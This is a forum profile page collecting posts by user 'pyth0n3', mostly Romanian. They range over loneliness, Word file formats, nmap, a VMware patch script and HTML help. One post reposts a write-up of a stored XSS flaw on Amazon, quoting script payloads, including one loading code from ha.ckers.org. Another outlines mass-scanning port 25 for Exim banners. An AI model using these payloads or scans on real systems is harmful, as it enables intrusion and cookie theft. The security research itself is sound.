Jump to content

pyth0n3

Active Members
  • Posts

    2099
  • Joined

  • Last visited

  • Days Won

    17

Everything posted by pyth0n3

  1. pyth0n3

    Singuratate

    @Golliath808 optimismul ajuta uneori în aceste situa?ii Ceea ce ar trebui pre?uit mult este viata , multi dau mai multa valoare la diverse alte lucruri Aerul care îl respiram este foarte pre?ios , banii nu pot cump?ra s?n?tatea Asa ca l?sa?i prostiile deoparte ?i pre?ui?i ceea ce trebuie pre?uit
  2. pyth0n3

    Singuratate

    Din cate am v?zut multi din voi vor sa fie singuri , cum am mai zis un timp determinat e bine dar crede?i-ma nu ?tiu cat o sa reu?i?i Eu am r?mas singur "acas?" de cr?ciun în ultimii ani (asta nu e o problema grava ) pot sa fac ce vreau , sa merg în oricare club la oricare pub , sa cunosc persoane noi Eu ma refer la singur?tate intrun mod divers intrun mod infinit si sa stiti ca nu e chiar asa cum credeti E foarte rau uneori sa fi singur la infinit Deci chiar dac? ai o prietena ?i mai cuno?ti cî?iva în cartier poti fi singur Prietena pleac? de s?rb?tori la familia ei , b?ie?ii din cartier fac la fel , si probabil revin pe parcurs dar cînd încep sa treac? anii î?i dai seama ca cineva î?i face companie doar pt faptul ca lucreaz? în acela?i ora? cu tine Singur înseamn? cînd vii seara acas? ?i nu e nimeni pe un timp indeterminat Singur înseamn? cînd tu î?i por?i de grija f?r? ca nimeni altul sa aib? un interes pt tine Singur înseamn? cînd doar tu te gînde?ti pt viitorul t?u ?i nu ai nici un sprijin Singur înseamn? cad nimic nu este stabil , singur înseamn? cînd nu poti accepta nici un sfat de la altii deoarece stii prea bine ca nu au trecut prin asemenea situa?ii Singur înseamn? cînd devii matur prea repede Singur înseamn? cînd iei decizii importante ?i nimeni nu î?i spune cum sa te compor?i chiar dac? sunt 100 de persoane în jurul t?u Singur înseamn? cînd î?i joci ultima carte f?r? sa ?tii dac? ai sa ob?ii ceea ce ti-ai propus sau ai sa pierzi totul Multi cred ca isi fac un obiectiv in viata si multe sacrificii pt a ob?ine ceea ce vor Dar ce se întîmpl? cînd ai un obiectiv si te sacrifici pt a obtine ceea ce vrei dar nu ob?ii ? Reu?e?ti sa în?elegi ca nu vei ob?ine ?i te opre?ti?Continui la infinit pt a ajunge la ceea ce ti-ai propus? Pe langa toate astea o mare negativitate de persoane care te înconjoar? care la rîndul lor vor sa te fac? sa crezi ca nu vei reu?i E?ti în singur?tate nimeni absolut nimeni nu te poate ajuta Uite ce înseamn? singur?tate , acum nu r?mîne decît cum sa o comba?i Cine iti vrea binele ? Cine vrea sa te vada ca obtii ceea ce vrei ? Nimeni , e?ti singur Fiecare te folose?te pt interesele lui , lucrezi pt cineva ca sa-i aduci profit ?i nu pt ca sa strîngi bani pt facultate Am observat ca doar cartea este cel mai bun prieten Uite ce înseamn? sa fi singur , toate deciziile trebuie sa le iei singur , dac? gre?e?ti ceva pl?te?ti foarte scump uneori
  3. pyth0n3

    Singuratate

    Rent a Friend To Meet New People And Find Platonic Companionship Make Friends Companion
  4. pyth0n3

    Singuratate

    @sharkyz Careful What You Wish For
  5. pyth0n3

    Singuratate

    Apropo mi-am g?sit ?i eu o agen?ie pe aici in ora? unde po?i sa închiriezi prieteni ca sa mergi intrun club Astia chiar ofer? servicii de acest tip , sh*t nu ?tiam @ * Acum întrebarea este cat de mult timp e?ti singur? Un cont este sa fi singur pe un timp determinat si un alt cont este sa fi pe timp indeterminat La un moment dat se schimba lucrurile
  6. pyth0n3

    Singuratate

    A fi singur nu e neap?rat a nu fi social , singur nu e neap?rat a avea gînduri sinuciga?e Singur nu e neap?rat a fi aruncat deoparte Bineîn?eles depinde cine ?i cum reu?e?te sa în?eleag? ceea ce îi caracterizeaz? ,faptul de a fi singur Anumite lucruri te pot constrînge uneori sa ramai singur Si intrun ora? mare po?i sa fi singur O data ce nu ai cu cine sa ie?i deoarece nu cuno?ti pe nimeni , deci chiar dac? e?ti printre alte persoane tot singur e?ti Ma refer la faptul de a fi p?r?sit pt al?ii (adic? frate tot anul suntem la college iar in vacanta to?i pleac? iar tu ramai la college (acolo e casa ta ) ) Deci uneori apar persoane , iti tin companie si dispar pt treburile lor iar tu ramai in aceeasi situatie Deci conversezi, cuno?ti , vezi , dar to?i au pe cineva undeva si o data pleac? , probabil revin dar pleac? iar (deci tu ai doar o mica importanta pe parcursul anului scolar sa spunem asa ) Oricat de multi ar fi tot singur e?ti deoarece la un moment dat to?i î?i vad de treburile lor , Sa nu crezi ca cineva iti da mai multa importanta ?ie decît altora Deci un alt exemplu ar fi: Jucam fotbal , suntem o echipa iar cînd se termina jocul fiecare pleac? ?i ramai singur în stadion , bineîn?eles po?i sa a?tep?i urm?toarea echipa de fotbal (dar vor pleca si ei cînd partida se termina )
  7. pyth0n3

    Singuratate

    SINGUR?TÁTE, (2) singur?t??i, s. f. 1. Faptul de a fi singur (1); starea celui care tr?ie?te singuratic (1); spec. izolare moral?. 2. Loc retras pe unde oamenii nu umbl? deloc sau trec foarte rar; loc pustiu, lipsit de oameni (?i de animale); pustietate; p. ext. izolare. – Singur + suf. -?tate. Intrebare : Cum defini?i acest cuvînt? Ma refer în general în orice fel de situa?ie Un exemplu poate fi: Ast?zi nu am vorbit cu nimeni , sunt singur , este 25 decembrie 2010, acela?i lucru anul trecut . Va place sa fi?i singuri? Cum e sa fi singur? Ma refer la cuvîntul singur (adic? f?r? nimeni inafara de pc ) Exemplu: Nici m?car o persoana , sau un animal care sa stea cu tine , nici m?car telefonul sa î?i sune , nimic inafara de tine
  8. Bine ai venit !
  9. Fisierul are urmatoarea extensie: Quick Security Reference - Cross-Site Scripting.docx #1 - TRADITIONAL WORD DOCUMENT resume.doc (one file) #2 - OFFICE OPEN XML WORD DOCUMENT resume.docx (one file, which is a zipped collection of the following folders & files) _rels FOLDER .rels (RELationshipS; pointers to app, core and document XML files) docProps FOLDER app.xml (page characteristics) core.xml (authorship, versions) word FOLDER document.xml (text content) fontTable.xml (fonts) settings.xml (spelling, grammar, math, spacing) styles.xml (paragraph styles) webSettings.xml (browser attributes) _rels SUBFOLDER document.xml.rels (pointers to other files) media SUBFOLDER image1.jpeg (embedded image) theme SUBFOLDER theme1.xml (foreign language attributes) Referente:How do I open docx files ? Il poti deschide spre exemplu in Google Docs Aici po?i sa îl descarci în HTML (zipped) http://www.sendspace.com/file/sur221 Aici poti sa il descarci in PDF http://www.sendspace.com/file/nvukya Aici pt cei care prefera OpenDocument Note:Not to be confused with Open Document Architecture http://www.sendspace.com/file/q03vfh
  10. Cum ai v?zut ca e asa securizat ? Ma aju?i ?i pe mine sa în?eleg ? Altceva ? Ce înseamn? securizat din punctul t?u de vedere ? Studiez security de aceea te-am întrebat, am nevoie de cîteva îndrum?ri Cum pot sa fac un site securizat? Cum pot sa fac un site super securizat? Ce servicii trebuie sa folosesc? Cum trebuie sa le configurez? Cum sa securizez un XSS? Ce altceva trebuie sa securizez? Ma po?i ajuta ?
  11. Albert Einstein: Dou? lucruri sunt infinite: universul ?i prostia omeneasc?, ?i înc? nu sunt sigur de primul.
  12. Asa este , difera algoritmul ar trebui v?zut în care condi?ii func?ioneaz?, nu va merge pe toate jocurile Sunt foarte multe produc?ii diverse în care vin introduse diverse tipuri de calcule în( ROM) @Krisler12™ poti preciza in care condi?ii func?ioneaz? ? ma refer ?tii m?car anumite tipuri de jocuri in care ar putea func?iona? (nu merge in toate si asta este sigur ) Model , serie ,etc ?
  13. man nmap -sV: Probe open ports to determine service/version info P.S. Presupun ca în compania în care lucrezi folosi?i nmap pt Network Discovery
  14. Se poate scrie un script în oricare limbaj de programare care sa execute un scan de tipul choose random sau range targets pe portul 25 Bineîn?eles va trebui sa fac? ?i un service version detection , dup? care vine creat un filtru in asa fel încît vin salvate doar target-urile care con?in ca banner ( Exim smtpd 4) ?i unde porturile sunt bineîn?eles în open state (op?iunile filtered sau closed nu trebuie sa fie luate în considerare de c?tre filtru creat ) P.S. Presupun ca compania în care lucrezi ?i-a cerut asa ceva pt pentesting
  15. Tested on Debian 2.6.32-bpo.5-686 , also may work on 2.6.x kernel version #!usr/bin/python ''' Author:This script was written by me [pyth0n3] to download and apply the patch written by Radu Cotescu [http://radu.cotescu.com/] for VMware Server 2.0.2 To do: First you need to download the VMware Server 2.0.2 [http://downloads.vmware.com/d/info/datacenter_downloads/vmware_server/2_0] Extract VMware Server: tar -xzf VMware-server-2.0.2-203138.i386.tar.gz Run this script in the same directory where you have extracted the previous package , it will apply the patch and Run VMWare installer (Tested by me on Ubuntu and Debian distribution) Purpose: Adds support for newer versions of the Linux kernel and does not require it to be recompiled Features: Add support for versions of the Linux Kernel that implement COW credentials. Add support for net_device_ops structure. Add support for netdev_priv(). Remove references to init_mm structure by removing APIC support for 2.6.25 and later (APIC code currently uses the macro pgd_offset_k). Suppress GCC warnings. Fix the vsock use of exported symbols from from vmci module problem. Fix the ether_setup() (misplaced) problem introduced by the previous patch (the NAT network connection problem). Fix other known issues. This script was written by me [pyth0n3] to download and apply the patch automatically ''' import os import glob import tarfile import urllib first = os.getcwd() print "[+] Downloading the patch file..." urllib.urlretrieve ("http://sprunge.us/THYP","VMware-server-2.0.2-203138-update-2.patch" ) print "[+] Retrieving old modules... " os.chdir("vmware-server-distrib/lib/modules/source/") for files in glob.glob("*.tar"): tar = tarfile.open(files) tar.extractall() tar.close() os.chdir(first) os.chdir("vmware-server-distrib") print "[+] Patching the modules and removing old archives..." cmd = "patch -p1 < ../VMware-server-2.0.2-203138-update.patch" os.system(cmd) os.chdir("lib/modules/source/") for files in glob.glob("*.tar"): os.remove(files) print "[+] Archiving patched modules..." cmd2 = ["tar -cf vmci.tar vmci-only/",\ "tar -cf vmmon.tar vmmon-only/",\ "tar -cf vmnet.tar vmnet-only/",\ "tar -cf vsock.tar vsock-only/"] for c in cmd2: os.system(c) print "[+] Run installer script as root..." os.chdir(first) os.chdir("vmware-server-distrib") cmd3 = "sudo ./vmware-install.pl" os.system(cmd3) Download : wget http://sprunge.us/fXbZ -O patch_vmware.py
      • 1
      • Upvote
  16. Tiffany Strauchs Rad, @tiffanyrad: International Cyber Jurisdiction: "Kill Switching" Cyberspace, Cyber Criminal Prosecution & Jurisdiction Hopping John Strauchs, @strauchs: Security and IT Convergence Richard Goldberg, @GoldbergLawDC: Rules of Engagment: Mitigating Risk in Information Security Work Jon McCoy: Ninja Patching .NET Marco Figueroa, @marcofigueroa & Kevin Figueroa: Detecting & Defending You Network using Nepenthes/Shaolin Tools Dave Marcus, @davemarcus: Using Social Networks To Profile, Find and 0wn Your Victims Brian Baskin, @bbaskin: P2P Forensics Brian Baskin, @bbaskin: Internationalized Domain Names & Investigations in the Networked World Deviant Ollam, @deviantollam: Don't Punch My Junk Michael Shearer, @theprez98: How to 0wn an ISP in 10 Minutes Christopher Witter, @mr_cwitter: Enterprise Packet Capture on Da'Cheap Ben Smith: Printer Exploitation Adrian Crenshaw, @irongeek_adc: Malicious USB Devices: Is that an attack vector in your pocket or are you just happy to see me? Shyaam Sundhar, @EvilFingers and John Fulmer, @DaKahuna2007: Is the IDS Dead? Chris Nickerson, @indi303: The State of (In)Security Gal Shpantzer, @shpantzer: Security Outliers: Cultural Cues from High-Risk Professions Michael Smith, @rybolov: DDoS Source: Irongeek
  17. There's a remarkable flaw in Amazon's web shop (tested on .de, co.uk, .com): It's a stored XSS vulnerability. So far so, good what's new? — is probably what you're thinking — XSS problems had Amazon and other major companies too in the past. "WAHH" revealing Amazon cookies under Vista/IE8 Picture 1: Web Application Hacker's Handbook (a.k.a. WAHH) exploiting Amazon (IE under Vista) This one is different though. Whereas the standard example for a stored XSS vulnerability over an out-of-band channel is a web mailer like OWA using SMTP here this channel for the attack is kind of — err, let's put it this way — unusual: One has to write a book! No, I am serious. This book needs to contain a crafted string so that it bypasses their weak/not existing filters/encodings and of course this book needs to be sold through Amazons shop and last but not least Amazon has to offer the "search in this book" functionality. Prerequisites for experience this vulnerability are not really on the tough side, i.e. it works with a usual browser. I was successful with Chrome 7/8 and Firefox 3.6 (both under Linux) as well as IE 8 (Win 7/Vista): 1. Go to <amazon.tld> (for TLD: see above, I guess every domain should work) 2. Search for "the right" web application security book, see below 3. Click on it (see above: it should be a book which offers to search in the content) 4. If it is the Web Application Hackers Handbook (picture 1) or the German book Sichere Webanwendungen (picture 2) search in the content for ADw ( +ADw- is UTF-7 for < ) 5. Put your mouse over the search result(s), bingo! Book "Sichere Webanwendungen" exploiting Amazon / my FF browser Picture 2: Book Sichere Webanwendungen shows vulnerability @ Amazon (Firefox) Not all search results work, in this example for the German book only the first XSS "flies". More on this below. Note that the second search result of this book has a (double) iframe on p216 with UTF-7 encoding (w/o any document.cookie ). Unfortunately the PHP script referred by the iframe doesn't exist currently. There's a good chance that this would work otherwise (hey Mario: how 'bout putting the file online? ;-)) It seems that amazon.com doesn't provide any HttpOnly or X-FRAME-OPTIONS in their HTTP headers as of now which would prevent modern browsers revealing their cookie or silently doing tricks more or less hidden in an iframe. Back to the issue: The search requests are submitted via XHR, it's a POST request with the variable query containing the search string. The (gzipped) JSON response contains an array, i.e. page number, search result string, base64 binary string, taking WAHH for example: {"error":{"text":{"args":{"LOGIN_RETURN_ARGS":"asin=0470170778&query=adw"},"key":"PLEASE_SIGN_IN_TEXT"},"title":{"key":"PLEASE_SIGN_IN_TITLE"},"reftag":"rdr_bar_login"},"totalResults":1,"results": [[447, "Seite 414", "following examples show some representations of the string <script>alert (document .cookie) </script> in nonstandard encodings: UTF-7: +ADw-script+AD4-alert (document", "pKvfaCQHPYP1mAOMsqHbIMO5DiEek6tcJ793LfEO3psFk9WN56CtZQ=="]]} Displayed in the browser is only a part of the search result (I left the HTML bold/<b> on purpose as it is also shown in the browser): "Seite 414 .cookie) </script> in nonstandard encodings: UTF-7: +ADw..." see also picture 3 in blue. So basically the whole thing is not a filter evasion by using UTF-7 encoding (for this to happen controlling the meta char-set header would be necessary, Amazon delivered in my research I did so far everything iso-8859-15 encoded). That it is not a filter evasion by using UTF-7 becomes more clear if you look deeper into the flaw the German book Sichere Webanwendungen revealed: If you search here for ADw three search results are being returned. The first result though is shown as an alert(2) : Seite 215</span> ...+ADw-script+AD4-alert(2)+ADw-/script+AD4-... Moving the mouse over the first result (see picture 2 at right hand side) however pops up an alert(1) dialog box. This is the preceding string from the JSON response which is the real payload: "216, "Seite 215", "haben viele Intrusion Detection Systeme und Web Application Firewalls in letzter Zeit in die- sen F\u00e4llen versagt. <html> <body> <script>alert(1)</script> +ADw-script+AD4-alert(2)+ADw-/script+AD4- </body> </html> Listing 6.4 UTF-7 XSS im IE dank MIME Type Guessing 215", "gdpIXdcHzw2/enkjgvEFzkiLrG+OK3jgKBVIfvgBbsDEW0HO2gJauA=="] This explains which of the both JavaScript popup works and that the whole thing is not a UTF-7 bypass issue as I first assumed stumbling over this phenomenon. The ADw string in the examples above was just helpful locating the right payload in a book and positioning the JSON response to the right window. The response is the basis for the "exploit", see variable tooltipText in picture 3 (green rectangle). Here the JavaScript from each examples is not filtered or encoded in any way, it's just passed 1:1 to tooltipText which is then interpreted in the browser if you move the mouse over the search result and the CSS tool-tip fires off. A good example I found during my research in the book XSS attacks: There (picture 4) you see in the bottom half the string referred by tooltipText which is then interpreted in the browser! Speaking of it: Search for owned in the latter book and move your mouse over the search result on page 84. Another one: search string fire , result at page 133. Or: Netscape , p152. Unfortunately RSnake's server delivers pages with a X-FRAME-OPTIONS header. So it looks like the iframe is there, but it doesn't include his HTML if you use a modern browser. Same page, same effect: query_string . (Further) payloads from WAHH: * embedded : p412 * actually : p417 * successful : p404 (two scripts fire!) Cool would have been to watch the payload on page 398 of WAHH — either the image or the error message (while "wiresharking"): <img src="http://192.168.1.1/hm_icon.gif" onerror="notNetgear()"> but I wasn't able to position the window correctly. Also the "copying the clipboard hack" at page 398 I couldn't get to fly. Amazon stallowned Picture 5: Amazon stallowned with XSS Attack, see also the URL The coolest thing ... or the weirdest — depends on your perspective — is the fact that the Stallowned hack from RSnake works! Wanna see it? Search in XSS attack for 1000 . The culprit is on page 28. Move your mouse there and it looks like Amazon is owned, you immediately get the picture at the right hand side (div overlay also setting the HTML title). What happened? There is on page 28 basically a listing containing one of RSnake's code snippets: Results 1 - 1- of 1000 for <b>"><script src=http://ha.ckers.org/s.js></script></b> on chrispederic.com. As you can see that piece of code made it into the tool-tip, that's it, bingo! Bottom line With a little bit of luck and time it should definitely be possible to find more payloads in web security books, well... until Amazon fixes this. I didn't try very hard though I own WAHH and the German book which makes it easier (XSS attack is on my list). If you have any luck in these or other books, I am curious on any reports (see discuss link below). The hint again: In order to shift the search result window into the right position one has provide a search string slightly before the payload, in rare cases also after the payload works. Normally it would make sense to notify the vendor or the shop first before publishing it. But as I consider a) the impact to the security of Amazon's shop minimal and the attack vector is kind of ... err.. tedious and thus it is not really a low hanging fruit for evildoers I guess Amazon can live with the fact that I publish this without prior notifying them. ;-) Nope, I didn't try whether stored customer comments work with any payload. But as this is a standard hack and amazon has been around for more than a while it would surprise me if this would not have been discovered by now. I tried Google books though and it doesn't seem to have this flaw. Source:Research: Remarkable 2nd order XSS @ Amazon or How to hack Amazon with a book
  18. Make a test on your system # !/usr/bin/perl -p # cd /usr/src/sys/crypto # perl rot13-evil.pl crypto* | grep pelcgbc | tail -n 1 # is you see pelcgbc then is you has backdoor BEGIN { @a = split //, "/-35753=?=357"x2; } s.([a-zA-Z]).ord $1<97?uc($1^$a[ord($1)-65]):lc($1^$a[ord($1)-97]).ge; Source: ROT13 in Perl
  19. The claim that the FBI planted a backdoor in OpenBSD a decade ago has been flatly denied by developer protagonists named as having been involved in the conspiracy in an email sent to OpenBSD founder, Theo de Raadt. Sent by former NETSEC CEO and contractor Gregory Perry, the contentious email named senior OpenBSD developer Jason Wright as having been responsible for inserting the backdoors into the IPSEC encryption implementation in the operating system. Wright has now angrily denied the claim in a public response, stating, “Every urban legend is made more real by the inclusion of real names, dates, and times. Gregory Perry's email falls into this category.” “I will state clearly that I did not add backdoors to the OpenBSD operating system or the OpenBSD crypto framework (OCF). It is a baseless accusation the reason for which I cannot understand,” he added. Confusion surrounds a second developer, Scott Lowe, mentioned by Perry in the email as having been involved in advocating the use of the compromised OpenBSD to suit the FBI’s alleged ends. It seems that this individual is proving hard to track down, and the two candidates traced by one journalist as being the named individuals have never had any involvement with OpenBSD or the FBI. In an email sent in the last day to IDG News Service journalist Robert McMillan, Perry appears to stand by his original claims without clearing up the confusion over the named conspirators. The reason for the email was that a 10-year non-disclosure agreement had recently expired, Perry said. What the security world is left with is a claim unambiguously denied by one participant, with the identity of a second named participant still uncertain. The plausibility of the claim rests mainly on the documented fascination that the authorities in the decade leading up to the alleged OpenBSD insertion that it was necessary to 'trap door' encryption technology on the basis that not doing so would eventually stymie official intelligence gathering. Examples of this range from the legal pursuit of PGP developer Phil Zimmermann for democratising encryption technology still governed by strict US arms export controls. The same period also saw the ill-starred Clipper Chip proposal to insert an escrowed encryption into every security device that would allow government access in certain circumstances. Source: TechWorld
  20. Este adev?rat , dar putini observa acest lucru , în rest multi probabil aleg o pisare masiva decît o oarecare cultura
  21. @botpass_y Probabil am exagerat pu?in Uite aici , 80 % din cod scris , trebuie doar modificata lista de link-uri verticale (Link3 , Link4) în asa fel încît sa apar? culoarea verde cînd treci cu mous-ul deasupra , bineîn?eles trebuie sa aib? acela?i font Verdana, Arial, Helvetica, sans-serif; ca ?i lista orizontala Note:Link3 si Link4 nu trebuie sa termine cu | (pipe) <html> <head> <title> List in html using CSS</title> </head> <style type="text/css"> <!-- A{text-decoration:none} --> #navcontainer { margin-bottom: 1em; overflow: hidden; width: 460px; } #navlist li.last { border:none; } #navlist { font-family:Verdana, Arial, Helvetica, sans-serif; font-size:.9em; font-weight:bold; text-align:center; } #navlist a { color:white; text-decoration:none; } #navlist a:hover { color:green; text-decoration:none; } #navlist li { display:inline; padding:0 .9em; border-right:1px solid white; } </style> <center> <div id="navcontainer"> <ul id="navlist"> <li id="active"><a href="#" id="current">Link1</a></li> <li><a href="#">Link2</a></li> </ul> </div> </center> <body style="background-color:black; color:white"> <head> </head> <h4>Link3</h4> <h4>Link4</h4> <pre>Trebuie modificata lista de link-uri (Link3 , Link4 in asa fel incat sa apara culoarea verde cand treci cu mous-ul peste ele (Uite Link1 ,Link2) ) folosind font-family:Verdana, Arial, Helvetica, sans-serif; Note:Link3 si Link4 nu trebuie sa termine cu | (pipe) </pre> </body> </html>
  22. Un salut ?i bine ai venit , mi-ar trebui sa creez un meniu orizontal cu 2 link-uri externe + un meniu vertical în partea stîng? a paginii cu alte 2 link-uri externe deci ar fi: ------------------------link1-------link2------------------------ -----link3 -----link4 Pagina trebuie sa aib? culoarea neagra , link-urile culoarea alba iar cînd cineva trece cu mous-ul deasupra unui link trebuie sa î?i schimbe culoare în verde Codul va trebui sa con?in? urm?toarele: font-family:Verdana, Arial, Helvetica, sans-serif; font-size:.9em; font-weight:bold;
  23. Bullshit , am mai cunoscut unul care zicea asa c?tre p?rin?i dar cred ca era a patra oara ?i nu ultima In rest sunt melodii care produc negativitate , aceste lucruri fac sa decada o persoana psihic Deci în loc sa fie constructive duc la nimic , în rest majoritatea ajung acolo pt ca nu reu?esc sa fie mai inteligen?i în ceea ce fac Iar dac? sunt destul de inteligen?i înseamna ca sa g?sit unul pu?in mai inteligent ?i ia prins de?i cred ca aici procentul este mai mic Problema este ca putini reu?esc sa se controleze , multi devin dependen?i de ceea ce fac , o alta varianta ar fi probabil foamea de bani , criza (care de fapt a intrat doar la oameni în cap ?i sunt obseda?i de ea ) , un alt factor esen?ial ar putea fi educa?ia proasta sau mai bine zis lipsa de cuno?tin?e pt a face macar lucrurile cu pu?in cap Nu spun aceste cuvinte ca ?i cum ace?ti factori nu ma afecteaz? în mod personal Deci nu vreau sa apar ca un critic care spune aceste lucruri dar de fapt sta bine Sunt în aceea?i oala cu to?i ,deci gîndi?i-va bine ce face?i , problemele trebuie trecute prin mai multe procese înainte de a fi rezolvate Înainte sa intra?i intrun site sau o alta re?ea pune?i-va întrebarea dac? merita R?spunsul presupun ca îl cunoa?te?i
×
×
  • Create New...